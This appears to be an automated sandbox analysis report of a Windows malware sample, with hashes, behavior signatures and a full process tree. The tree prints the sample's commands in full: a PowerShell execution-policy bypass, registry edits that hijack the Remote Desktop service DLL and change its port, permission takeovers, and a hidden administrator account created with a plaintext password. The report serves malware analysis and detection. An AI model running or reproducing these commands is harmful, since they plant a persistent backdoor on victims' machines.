Analysis
-
max time kernel
56s -
max time network
88s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 21:16
Static task
static1
Behavioral task
behavioral1
Sample
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe
Resource
win7-20220414-en
General
-
Target
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe
-
Size
3.4MB
-
MD5
c53305cbf3645ab5c84469b892058413
-
SHA1
0a08890c0e5c082ff135fc5df493c346335bdba5
-
SHA256
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c
-
SHA512
b9b35d0f26e456c826623de80c084f3fbd523f9c3cd9e5230150e45508c1a128d1f19a7786b1ebf4008705a7843a36ec0c0c084b870c2258d8238cdb4bb30f88
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exepid process 4580 icacls.exe 3304 icacls.exe 1096 icacls.exe 1448 icacls.exe 4208 icacls.exe 728 icacls.exe 4576 takeown.exe 4564 icacls.exe -
Processes:
resource yara_rule C:\Windows\Branding\mediasrv.png upx C:\Windows\Branding\mediasvc.png upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe -
Loads dropped DLL 10 IoCs
Processes:
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exepid process 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 4564 icacls.exe 4580 icacls.exe 3304 icacls.exe 1096 icacls.exe 1448 icacls.exe 4576 takeown.exe 4208 icacls.exe 728 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4728 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4360 powershell.exe 4360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4360 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.execmd.exedescription pid process target process PID 4116 wrote to memory of 4248 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe cmd.exe PID 4116 wrote to memory of 4248 4116 7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe cmd.exe PID 4248 wrote to memory of 4728 4248 cmd.exe timeout.exe PID 4248 wrote to memory of 4728 4248 cmd.exe timeout.exe PID 4248 wrote to memory of 4360 4248 cmd.exe powershell.exe PID 4248 wrote to memory of 4360 4248 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe"C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵PID:4412
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
PID:2220
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵PID:3976
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4208
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:728
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4564
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4580
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3304
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1096
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1448
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4576
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:5072
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵PID:308
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵PID:1040
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵PID:888
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵PID:4688
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵PID:4216
-
-
-
-
C:\Windows\system32\timeout.exetimeout -t 151⤵
- Delays execution with timeout.exe
PID:4728
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr1⤵PID:4440
-
C:\Windows\system32\net.exenet start rdpdr1⤵PID:3220
-
C:\Windows\system32\cmd.execmd /c net start rdpdr1⤵PID:3152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService1⤵PID:432
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:4596
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:1652
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc gCLJ4u2E /add1⤵PID:980
-
C:\Windows\system32\net.exenet.exe user wgautilacc gCLJ4u2E /add1⤵PID:3652
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD1⤵PID:4020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD2⤵PID:1108
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc gCLJ4u2E1⤵PID:1472
-
C:\Windows\system32\net.exenet.exe user wgautilacc gCLJ4u2E2⤵PID:1732
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc gCLJ4u2E1⤵PID:3388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:1820
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:852
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:1912
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD1⤵PID:3536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:2904
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:3076
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1936
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc gCLJ4u2E /add1⤵PID:2892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del1⤵PID:4092
-
C:\Windows\system32\net.exenet start TermService1⤵PID:376
-
C:\Windows\system32\cmd.execmd /c net start TermService1⤵PID:1744
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0fae5b04f67d12ca621200aac5378dc
SHA1c82c80ff2a2abb57e9a23ac5a100d82c1d551238
SHA256de678dd80006ed864550a034f48a93bf1cb5a31d706d6f25694f577f7867f2a0
SHA51227e1c30a1ad0ab381f037eb4313f11c9c7c3eaa78b5893ba0df04cac006a4169c92d3c6f3b09d181c6862491f8793818d0e9becf355b9aa4a70bef199c536ff8
-
Filesize
300KB
MD59a84ff18f0bc611158cea8aa0604bb0d
SHA185bce44b346881c3bda10e8cdb3facce7dabd2e4
SHA256bb9daa0cede4d1a7246d4ea8fdb5a1a1105677b2db0bdb167bae3c6218792943
SHA5124585bef776461049d917d2e593847a0d2f6617bf065391626de216d76175324d3fa479f874bbfeba20abe5b6aa04d10df3c36032f725d25b6b45caffb89d92e6
-
Filesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
146KB
MD577a26c23948070dc012bba65e7f390aa
SHA17e112775770f9b3b24e2a238b5f7c66f8802e5d8
SHA2564e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43
SHA5122e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065
-
Filesize
54KB
MD5acc5f33ea59a3aceb71f356e818aa32e
SHA1483682b15fa526f620e525292a26c868fd809769
SHA25656fb4078bce366f84deb9236987465ac616717da91edb409344bdbec5f8969d9
SHA51214676268e9a25ae1fae66b758ac508f1e18ef520af044d8626b6c2be48bdcc5d7983d12fbeb112c06e7b1f24bdc3c6edd57a2aa6c91b40fbe38ea93a0956cd44
-
Filesize
605KB
MD5ae5ca4c711ac6645927c516c0f9f1c8d
SHA163ced5bfc231e8c72bef1eacb81c7afa717021c3
SHA256a27f2bba416d4a0aec01624ccc5c47bb075b8b154050c0c5a9d4b9f28f376ba7
SHA51246f5bc589b99feac984d0447856524e8e821ad5031d29d0e49f1fc56793240b0ef0f01a555f0407c5438832bd00c07e8a2a3844a8105d88a44b833a9dbf4d147
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7